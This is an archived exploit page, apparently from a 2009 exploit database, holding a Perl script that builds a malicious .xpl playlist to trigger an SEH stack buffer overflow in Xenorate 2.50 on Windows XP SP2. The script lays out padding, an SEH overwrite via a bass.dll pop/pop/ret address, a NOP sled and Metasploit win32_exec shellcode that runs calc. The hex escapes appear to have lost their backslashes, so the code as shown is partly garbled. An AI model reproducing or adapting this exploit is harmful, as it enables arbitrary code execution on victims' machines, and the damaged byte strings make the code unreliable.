Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)
# Published : 2009-12-10
# Author : germaya_x
# Previous Title : Millenium MP3 Studio 2.0 (PLS File) Universal Stack Overflow (meta)
# Next Title : Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH) (meta)

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
 Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)
==============================================================================
	[a] Exploited by:.......[       germaya_x       ].....................
        [a] Script:.............[       Xenorate        ].....................
        [a] version:............[        2.5.0.0        ]..................... 
	[a] Today:..............[       05/10/2009      ].....................
        [a] platform............[        Windows        ].....................
        [a] tested on:..........[     Windows XP SP2    ].....................
        [a] greetz:.............[  his0k4/D3v!LFUCK3R   ].....................
==============================================================================


	
=cut
##############################################################################
my $bof="x41" x 88;
my $next_seh="xEBx06x90x90";#short jmp
my $SEH="xFDxA4x00x10";#p/p/r--->bass.dll
my $nop="x90" x 20;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

###################################################################
open(myfile,'>> germaya_x.xpl');
print myfile $bof.$next_seh.$SEH.$nop.$Shcode;
###################################################################